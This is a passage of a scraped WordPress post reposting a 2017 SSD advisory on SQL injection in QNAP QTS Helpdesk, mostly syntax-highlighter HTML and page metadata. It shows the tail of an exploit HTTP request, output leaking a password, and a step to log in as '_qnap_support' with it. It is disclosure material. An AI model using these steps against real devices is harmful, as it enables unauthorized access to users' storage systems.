class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11c122986552-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">deflate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sdch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11c122986552-9\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">PL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11c122986552-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11c122986552-11\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>And the output should look like:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb11f488526724\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;&#8220;  | App Name | Log Path | Create Time |  | bb | BqGgseHn &lt;&#8211; this is password | 1974-10-02 01:52:48 |  &#8220;&#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11f488526724-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11f488526724-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11f488526724-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11f488526724-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11f488526724-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11f488526724-2\"><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">App <\/span><span class=\"crayon-v\">Name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Log <\/span><span class=\"crayon-v\">Path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Create <\/span><span class=\"crayon-v\">Time<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11f488526724-3\"><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BqGgseHn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1974<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11f488526724-4\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>Now you can login as:<br \/> Login: _qnap_support<br \/> Password: Obtained from SQL Injection<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3469\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 09 Oct 2017 14:26:28 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier. QNAP helpdesk: &#8220;Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the Internet, open Helpdesk from the App &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3469\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 QNAP HelpDesk SQL Injection<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12135,10757,12096],"class_list":["post-9766","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-disclosure","tag-securiteam-secure-disclosure","tag-sql-injection"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9766","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9766"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9766\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9766"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9766"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9766"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}